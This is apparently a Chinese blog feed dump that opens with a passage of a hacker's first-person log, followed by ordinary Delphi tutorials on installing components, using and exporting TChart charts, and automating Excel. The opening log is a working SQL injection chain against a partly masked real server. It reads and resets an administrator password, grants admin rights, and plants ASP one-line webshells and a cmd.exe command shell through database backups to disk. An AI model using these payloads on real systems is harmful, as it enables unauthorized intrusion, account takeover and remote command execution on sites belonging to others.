http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html ' and (select top 1 editor_password from EDITORLIST order by editor_id desc) >1 and 'a'='a

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html' and ( select editor_id from EDITORLIST where editor_password='618a5676d977177f') =11 and 'a'='a

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html' and ( select editor_id from EDITORLIST where editor_password='618a5676d977177f') =11 and 'a'='a

插入一条用户管理员 并查询


更改管理员密码

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';update EDITORLIST set editor_password='469e80d32c0559f8' where editor_password='618a5676d977177f';select top 1 a from ahcmd where 'a'='a

插入管理员权限


http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';insert into EDITORRIGHT(right_editor_id,right_func_id )values(11,4);select top 1 a from ahcmd where 'a'='a


哈已经可以登陆它的后台了,,,,可是后台没有上传的功能。。。。。郁闷


登陆地址 :××××××× 我就不写了。。。


目的已经达到了,为了生成一个webshell我考虑来考虑去,只有一句话木马和备份法可以实现哦。。

好决定再试试。。。。
------------------------

备份生成一句话木马

测试:

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';use SearchLog;use EMASSIST;select top 1 a from ahcmd where 'a'='a

OK!

---创建一句话木马-
http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';insert into ahcmd (a) values ('<%execute request("value")%>');select top 1 a from ahcmd where 'a'='a

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';BACKUP DATABASE EMASSIST to disk='d:\assist\bak\t.asp' with DIFFERENTIAL,init;select top 1 a from ahcmd where 'a'='a




--http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';use SearchLog;create table cmd(str image);use EMASSIST;select top 1 a from ahcmd where 'a'='a

---http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';use SearchLog;insert into cmd(str) values ('<%execute request("value")%>');use EMASSIST;select top 1 a from ahcmd where 'a'='a

http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html';use SearchLog;BACKUP DATABASE SearchLog to disk='d:\assist\bak\t.asp' with DIFFERENTIAL,init;use EMASSIST;select top 1 a from ahcmd where 'a'='a

查看
http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html ' and (select top 1 str from SearchLog.dbo.[cmd])>1 and 'a'='a




----------------------创建简洁shell



http://61.****/assist/dim_counter2.asp?di=103&gourl=http://www.***.com/xgss/newstock.html'; create table cmd(str image); insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c"&request("c")).stdout.readall%>');backup database model to disk='d:\assist\bak\l.asp with DIFFERENTIAL,init;select top 1 a from ahcmd where 'a'='a


好了,,,,,已经创建了我的木马和 webshell了,,,,


提权?又是一件很麻烦的事情哦。。。。。。。。。。。。。。。。


这里就不接着说了,很多老方法现在都不能用了,,我自己也没继续弄下去,的确很痛苦的一件事。。。。



^_^。。。。。。。。。。]]> <![CDATA[delphi安装控件的方法]]> http://www.newtzly.net/newblog/u/roki/archives/2008/1210.html roki 2008-1-12 17:59:00  
基本安装  
1、对于单个控件,Componet-->install component..-->PAS或DCU文件-->install;
2、对于带*.dpk文件的控件包,File-->Open(下拉列表框中选*.dpk)-->install即可;
3、对于带*.bpl文件的控件包,Install Packages-->Add-->bpl文件名即可;
4、如果以上Install按钮为失效的话,试试Compile按钮;
5、是run time lib则在option下的packages下的runtimepackes加之。
     如果编译时提示文件找不到的话,一般是控件的安装目录不在Delphi的Lib目录中,有两种方法可以解决:
1、反安装的源文件拷入到Delphi的Lib目录下;
2、或者Tools-->Environment Options中把控件源代码路径加入到Delphi的Lib目录中即可。
注意:所安装的控件是否与你所用的Delphi版本相适应。

RxLib的安装  
首先在Delphi 5 的 IDE 中将以前版本的 Rxlib 反安装掉,删除 RXCTL5.BPL、RXDB5.BPL、 RXBDE5.BPL、DCLRX5.BPL、 DCLRXDB5.BPL 和DCLRXBD5.BPL。
打开 Rx 的运行包 RXCTL5.DPK,在 Package 窗口中按 Compile 按钮编译 RXCTL5.DPK ,然后用同样方法编译另两个运行包RXDB5.DPK 和 RXBDE5.DPK ,将编译后的三个 BPL 文件放到搜索路径中,如 WINDOWS\SYSTEM等。
在编译完运行包后你必须将 RX 的设计期包安装到 IDE 环境中。
打开 Rx 的设计期包 DCLRX5.DPK,在 Package 窗口中按 Compile 按钮编译,然后按 Install按钮将设计期包注册到组件面板中。用同样的方法安装 DCLRXDB5.DPK 和 DCLRXBD5.DPK。
注意:不要在 Delphi IDE 中保存包资源(package sources)!

帮助文件的安装  
单击 Delphi 中的 Help 菜单下的 Customize 菜单项,这时会弹出 OpenHelp 对话框,选择在 Index 页下,打开 Edit 菜单下的 Add Files 菜单,添加你要加入的帮助菜单,这样你就可以在 Delphi 的 IDE 下使用该帮助文件了。
  
控件删除   
在Component/Install Packages中删除。
选Component/configure Palette…
有pages和components两个区域
双击components区域,选中要删除得控件,下面有得Delete按钮
但系统提供的控件只能Hide,不能delete。
打开控件所在的包文件(*.dpk),从中删除控件那个文件,再重新编译该包即可
如果是整个控件包都要删除的话,project->Option->Packages,删掉那个packages,That would be ok~  
]]> <![CDATA[TCHART的用法]]> http://www.newtzly.net/newblog/u/roki/archives/2008/1209.html roki 2008-1-12 17:36:00 最近开发要使 用图表,Delphi里提供了图表开发的控件TChart,可惜帮助里没有DEMO代码,上网搜索了一下,竟然发现文章也少的可怜。没办法,自己丰衣足 食,写代码试用,看帮助,读代码,搞了半天大概弄明白了TChart的使用方式,下面写一下几个常见问题的解决。
1.如何写一个TChart的Hello World?
放一个控件到窗体上,然后写代码加入一个折线数据序列:
var
Series: TLineSeries;
begin
Series := TLineSeries.Create(Chart1);
Series.Add(100, 'aaa', clRed);
Series.Add(200, 'AAA', clGreen);
Chart1.AddSeries(Series);
end;
这样就会生成一个简单的折线图表,要生成其它类型的数据图表,可以添加不同的数据序列(各种图表的序列类型可以参考帮助文档)。
2.如何设置图表的标题?
TChart组件提供了Title属性可以这是图表的标题,包括标题的内容、字体、对齐方式等都可以通过Title属性设置。
最简单的设置方式:
Chart1.Title.Text.Text := '图表的标题';
3.如何修改图表的背景颜色和整个图表的颜色?
TChart是一个窗体控件,可以通过修改Color属性设置图表颜色,这是一种最简单的方式:
Chart1.Color := clWhite;
修改图表部分的背景色可以通过BackColor属性来实现:
Chart1.BackColor := clGreen;
此外,TChart还提供了渐变的背景支持,通过Gradient控制:
Chart1.Gradient.Visible := True;
Chart1.Gradient.Direction := gdFromTopLeft;
Chart1.Gradient.StartColor := clGreen;
Chart1.Gradient.EndColor := clYellow;
4.TChart的3D效果如何控制?
TChart提供了View3D属性,控制是否使用3D效果,View3dWalls属性控制是否显示左侧的3D墙效果
5.如何不显示图表控件生成图表?
很遗憾,TChart是一个Windows窗体控件,必须依附一个窗体或Windows控件才能使用。如果要不显示TChart的话,可以将TChart的Visible属性设为False来使用。下面的例子创建了一个隐藏的TChart来生成图表:
var
Chart: TChart;
S: TChartSeries;
TmpFile: string;
begin
Chart := TChart.Create(nil);
try
    Chart.Parent := Application.MainForm;
    Chart.Visible := False;
    Chart.Title.Text.Text := '测试图表';
    S := TBarSeries.Create(Chart);
    Chart.AddSeries(S);
    S.Title := '嘿嘿';
    S.AddXY(1, 56, '一月', clGreen);
    S.AddXY(2, 67, '二月', clYellow);
    S.AddXY(3, 34, '三月', clBlue);
    S.AddXY(4, 78, '四月', clRed);
    Chart.View3D := False;
    Chart.BackColor := clWhite;
    Chart.Gradient.StartColor := clWhite;
    Chart.Gradient.EndColor := clWhite;
    Chart.Gradient.Visible := True;
    TmpFile := Application.ExeName + '.bmp';
    Chart.SaveToBitmapFile(TmpFile);
    Image1.Picture.LoadFromFile(TmpFile);
finally
    Chart.Free;
end;
end;
 
 
 
 
------导出成图片------------------
 

1. TChart7前的版本

TChart7前的TChart可以通过类似于Chart1.Export.SaveToJPEGFile的方法把TChart存成需要的图像格式,但到TChart7后TChart就没有Export属性了,要导出图像要用下面的方法。我尽量用代码说明问题,如果细节不够的话,自己可以查询相应的源代码进行学习。

2. TChart7导出BMP、WMF

TChart7提供导出BMP、WMF的方法,直接调用即可,例子如下:

Chart1.SaveToBitmapFile('c:\1.bmp');
Chart1.SaveToMetafile('c:\1.wmf');

3. TChart7导出JPG(JPEG)

TChart7导出JPG(JPEG)也比较简单,在本单元中uses TeeJPEG单元,然后执行TeeJPEG中的TeeSaveToJPEG或TeeSaveToJPEGFile。例子如下:

//注意要包含TeeJPEG才可以。
implementation
uses
  TeeJPEG;

procedure TForm1.Button2Click(Sender: TObject);
begin
  TeeSaveToJPEG(Chart1, 'c:\1.jpg', -1, -1);//后面的两个参数是宽和高,如果用TeeChart的宽、高可以设为-1.
end;

4. TChart7导出GIF

TChart7导出GIF比较复杂一些,还是用代码举例吧。

//注意要包含TeeGIF才可以。
implementation
uses
  TeeGIF;

procedure TForm1.Button3Click(Sender: TObject);
var
  exp : TGIFExportFormat;
  frm : TTeeGIFOptions;
begin
  exp := TGIFExportFormat.Create;
  exp.Panel := Chart1;
  frm := TTeeGIFOptions(exp.Options());
  frm.CBReduction.ItemIndex := 3;
  exp.SaveToFile('c:\1.gif');
  exp.Free;
end;

稍微解释一下,上面的例子对于TChart7的图像导出很有代表意义,其实所有格式的导出到可以用上例的方式,只是把TGIFExportFormat换成需要的格式即可,因为所有的导出都对应一种格式。

上面例子中,生成一个导出的格式类对象,设置此格式要导出的Chart,如果有必要再设定导出的选项。导出选项要特别提醒一下,所有导出格式的导出选项都是通过格式类的Options()函数得到的窗体进行设置的,这点比较奇怪。

GIF导出是必须设定frm.CBReduction.ItemIndex,因为此项缺省为0,导出是会报“Color Table error....”的错误,所以必须设为非零的值,每个值代表什么意思,自己可以查一下。

5. TChart7导出PCX

TChart7导出PCX同导出GIF极其类似,代码示例如下:

//注意要包含TeePCX才可以。
implementation
uses
  TeePCX;

procedure TForm1.Button4Click(Sender: TObject);
var
  exp : TPCXExportFormat;
begin
  exp := TPCXExportFormat.Create;
  exp.Panel := Chart1;
  exp.SaveToFile('c:\1.pcx');
  exp.Free;
end;

6. TChart7导出HTM

TTChart7可以直接导出到HTM,在本单元中uses TeeVMLCanvas单元,然后执行TeeVMLCanvas中的TeeSaveToVMLFile即可。示例如下:

//注意要包含TeeVMLCanvas才可以。
implementation
uses
  TeeVMLCanvas;
procedure TForm1.Button5Click(Sender: TObject);
begin
  TeeSaveToVMLFile(Chart1, 'c:\1.html');
end;

7. TChart7导出PNG

TTChart7可以很容易导出到PNG,在本单元中uses TeePNG单元,然后执行TeePNG中的TeeSaveToPNG即可。示例如下:

//注意要包含TeePNG才可以。
implementation
uses
  TeePNG;

procedure TForm1.Button7Click(Sender: TObject);
begin
  TeeSaveToPNG(Chart1, 'c:\1.png');
end;

要注意的是,保存PNG格式需要LPng.dll,所以为了能正常运行上例代码需下载安装LPng.dll。

8. 结语

本文给出了TeeChart7导出图像时的方法,每种方式都给出了代码示例,希望对使用TChart7的图像导出进行汇总。

 
]]> <![CDATA[Delphi 控制Excel]]> http://www.newtzly.net/newblog/u/roki/archives/2008/1208.html roki 2008-1-2 23:11:00 (一) 使用动态创建的方法

首先,在前面 要 uses COMOBJ ,不然会提示没有定义CreateOleObject

动态创建 Excel 对象,使用ComObj:
var ExcelApp: Variant;
ExcelApp := CreateOleObject( 'Excel.Application' );
1) 显示当前窗口:
ExcelApp.Visible := True;
2) 更改 Excel 标题栏:
ExcelApp.Caption := '应用程序调用 Microsoft Excel';
3) 添加新工作簿:
ExcelApp.WorkBooks.Add;
4) 打开已存在的工作簿:
ExcelApp.WorkBooks.Open( 'C:\Excel\Demo.xls' );
5) 设置第2个工作表为活动工作表:
ExcelApp.WorkSheets[2].Activate;  或 ExcelApp.WorksSheets[ 'Sheet2' ].Activate;
6) 给单元格赋值:
ExcelApp.Cells[1,4].Value := '第一行第四列';
7) 设置指定列的宽度(单位:字符个数),以第一列为例:
ExcelApp.ActiveSheet.Columns[1].ColumnsWidth := 5;
8) 设置指定行的高度(单位:磅)(1磅=0.035厘米),以第二行为例:
ExcelApp.ActiveSheet.Rows[2].RowHeight := 1/0.035; // 1厘米
9) 在第8行之前插入分页符:
ExcelApp.WorkSheets[1].Rows.PageBreak := 1;
10) 在第8列之前删除分页符:ExcelApp.ActiveSheet.Columns[4].PageBreak := 0;
11) 指定边框线宽度:
ExcelApp.ActiveSheet.Range[ 'B3:D4' ].Borders[2].Weight := 3;
1-左    2-右   3-顶    4-底   5-斜( \ )     6-斜( / )
12) 清除第一行第四列单元格公式:
ExcelApp.ActiveSheet.Cells[1,4].ClearContents;
13) 设置第一行字体属性:ExcelApp.ActiveSheet.Rows[1].Font.Name := '隶书';
ExcelApp.ActiveSheet.Rows[1].Font.Color  := clBlue;
ExcelApp.ActiveSheet.Rows[1].Font.Bold   := True;
ExcelApp.ActiveSheet.Rows[1].Font.UnderLine := True;
14) 进行页面设置:
a.页眉:
   ExcelApp.ActiveSheet.PageSetup.CenterHeader := '报表演示';
b.页脚:
   ExcelApp.ActiveSheet.PageSetup.CenterFooter := '第&P页';
c.页眉到顶端边距2cm:
   ExcelApp.ActiveSheet.PageSetup.HeaderMargin := 2/0.035;
d.页脚到底端边距3cm:
   ExcelApp.ActiveSheet.PageSetup.HeaderMargin := 3/0.035;
e.顶边距2cm:
   ExcelApp.ActiveSheet.PageSetup.TopMargin := 2/0.035;
f.底边距2cm:
   ExcelApp.ActiveSheet.PageSetup.BottomMargin := 2/0.035;
g.左边距2cm:
   ExcelApp.ActiveSheet.PageSetup.LeftMargin := 2/0.035;
h.右边距2cm:
   ExcelApp.ActiveSheet.PageSetup.RightMargin := 2/0.035;
i.页面水平居中:
   ExcelApp.ActiveSheet.PageSetup.CenterHorizontally := 2/0.035;
j.页面垂直居中:
   ExcelApp.ActiveSheet.PageSetup.CenterVertically := 2/0.035;
k.打印单元格网线:
   ExcelApp.ActiveSheet.PageSetup.PrintGridLines := True;
15) 拷贝操作:
a.拷贝整个工作表:   ExcelApp.ActiveSheet.Used.Range.Copy;
b.拷贝指定区域:   ExcelApp.ActiveSheet.Range[ 'A1:E2' ].Copy;
c.从A1位置开始粘贴:   ExcelApp.ActiveSheet.Range.[ 'A1' ].PasteSpecial;
d.从文件尾部开始粘贴:   ExcelApp.ActiveSheet.Range.PasteSpecial;
16) 插入一行或一列:
a. ExcelApp.ActiveSheet.Rows[2].Insert;
b. ExcelApp.ActiveSheet.Columns[1].Insert;
17) 删除一行或一列:
a. ExcelApp.ActiveSheet.Rows[2].Delete;
b. ExcelApp.ActiveSheet.Columns[1].Delete;
18) 打印预览工作表:
ExcelApp.ActiveSheet.PrintPreview;
19) 打印输出工作表:
ExcelApp.ActiveSheet.PrintOut;
20) 工作表保存:
if not ExcelApp.ActiveWorkBook.Saved then
  ExcelApp.ActiveSheet.PrintPreview;
21) 工作表另存为:
ExcelApp.SaveAs( 'C:\Excel\Demo1.xls' );
22) 放弃存盘:
ExcelApp.ActiveWorkBook.Saved := True;
23) 关闭工作簿:
ExcelApp.WorkBooks.Close;
24) 退出 Excel:
ExcelApp.Quit;
(二) 使用Delphi 控件方法
在Form中分别放入ExcelApplication, ExcelWorkbook和ExcelWorksheet。
正在装载数据……

1)  打开Excel
ExcelApplication1.Connect;
2) 显示当前窗口:
ExcelApplication1.Visible[0]:=True;
3) 更改 Excel 标题栏:
ExcelApplication1.Caption := '应用程序调用 Microsoft Excel';
4) 添加新工作簿:
ExcelWorkbook1.ConnectTo(ExcelApplication1.Workbooks.Add(EmptyParam,0));
5) 添加新工作表:
var Temp_Worksheet: _WorkSheet;
begin
Temp_Worksheet:=ExcelWorkbook1.
WorkSheets.Add(EmptyParam,EmptyParam,EmptyParam,EmptyParam,0) as _WorkSheet;
ExcelWorkSheet1.ConnectTo(Temp_WorkSheet);End;
6) 打开已存在的工作簿:
ExcelApplication1.Workbooks.Open (c:\a.xls
EmptyParam,EmptyParam,EmptyParam,EmptyParam,
EmptyParam,EmptyParam,EmptyParam,EmptyParam,
   EmptyParam,EmptyParam,EmptyParam,EmptyParam,0)
7) 设置第2个工作表为活动工作表:
ExcelApplication1.WorkSheets[2].Activate;  或
ExcelApplication1.WorksSheets[ 'Sheet2' ].Activate;
8) 给单元格赋值:
ExcelApplication1.Cells[1,4].Value := '第一行第四列';
9) 设置指定列的宽度(单位:字符个数),以第一列为例:
ExcelApplication1.ActiveSheet.Columns[1].ColumnsWidth := 5;
10) 设置指定行的高度(单位:磅)(1磅=0.035厘米),以第二行为例:
ExcelApplication1.ActiveSheet.Rows[2].RowHeight := 1/0.035; // 1厘米
11) 在第8行之前插入分页符:
ExcelApplication1.WorkSheets[1].Rows.PageBreak := 1;
12) 在第8列之前删除分页符:
ExcelApplication1.ActiveSheet.Columns[4].PageBreak := 0;
13) 指定边框线宽度:
ExcelApplication1.ActiveSheet.Range[ 'B3:D4' ].Borders[2].Weight := 3;
1-左    2-右   3-顶    4-底   5-斜( \ )     6-斜( / )
14) 清除第一行第四列单元格公式:
ExcelApplication1.ActiveSheet.Cells[1,4].ClearContents;
15) 设置第一行字体属性:
ExcelApplication1.ActiveSheet.Rows[1].Font.Name := '隶书';
ExcelApplication1.ActiveSheet.Rows[1].Font.Color  := clBlue;
ExcelApplication1.ActiveSheet.Rows[1].Font.Bold   := True;
ExcelApplication1.ActiveSheet.Rows[1].Font.UnderLine := True;
16) 进行页面设置:
a.页眉:
   ExcelApplication1.ActiveSheet.PageSetup.CenterHeader := '报表演示';
b.页脚:
   ExcelApplication1.ActiveSheet.PageSetup.CenterFooter := '第&P页';
c.页眉到顶端边距2cm:
   ExcelApplication1.ActiveSheet.PageSetup.HeaderMargin := 2/0.035;
d.页脚到底端边距3cm:
   ExcelApplication1.ActiveSheet.PageSetup.HeaderMargin := 3/0.035;
e.顶边距2cm:
   ExcelApplication1.ActiveSheet.PageSetup.TopMargin := 2/0.035;
f.底边距2cm:
   ExcelApplication1.ActiveSheet.PageSetup.BottomMargin := 2/0.035;
g.左边距2cm:
   ExcelApplication1.ActiveSheet.PageSetup.LeftMargin := 2/0.035;
h.右边距2cm:
   ExcelApplication1.ActiveSheet.PageSetup.RightMargin := 2/0.035;
i.页面水平居中:
   ExcelApplication1.ActiveSheet.PageSetup.CenterHorizontally := 2/0.035;
j.页面垂直居中:
   ExcelApplication1.ActiveSheet.PageSetup.CenterVertically := 2/0.035;
k.打印单元格网线:
   ExcelApplication1.ActiveSheet.PageSetup.PrintGridLines := True;
17) 拷贝操作:
a.拷贝整个工作表:
   ExcelApplication1.ActiveSheet.Used.Range.Copy;
b.拷贝指定区域:
   ExcelApplication1.ActiveSheet.Range[ 'A1:E2' ].Copy;
c.从A1位置开始粘贴:
   ExcelApplication1.ActiveSheet.Range.[ 'A1' ].PasteSpecial;
d.从文件尾部开始粘贴:
   ExcelApplication1.ActiveSheet.Range.PasteSpecial;
18) 插入一行或一列:
a. ExcelApplication1.ActiveSheet.Rows[2].Insert;
b. ExcelApplication1.ActiveSheet.Columns[1].Insert;
19) 删除一行或一列:
a. ExcelApplication1.ActiveSheet.Rows[2].Delete;
b. ExcelApplication1.ActiveSheet.Columns[1].Delete;
20) 打印预览工作表:
ExcelApplication1.ActiveSheet.PrintPreview;
21) 打印输出工作表:
ExcelApplication1.ActiveSheet.PrintOut;
22) 工作表保存:
if not ExcelApplication1.ActiveWorkBook.Saved then
  ExcelApplication1.ActiveSheet.PrintPreview;
23) 工作表另存为:
ExcelApplication1.SaveAs( 'C:\Excel\Demo1.xls' );
24) 放弃存盘:
ExcelApplication1.ActiveWorkBook.Saved := True;
25) 关闭工作簿:
ExcelApplication1.WorkBooks.Close;
26) 退出 Excel:
ExcelApplication1.Quit;
ExcelApplication1.Disconnect;]]> <![CDATA[《洛奇心语——2007光辉岁月》]]> http://www.newtzly.net/newblog/u/roki/archives/2007/1207.html roki 2007-12-24 4:47:00 <![CDATA[《洛奇心语——望梅止渴》]]> http://www.newtzly.net/newblog/u/roki/archives/2007/1206.html roki 2007-12-23 2:14:00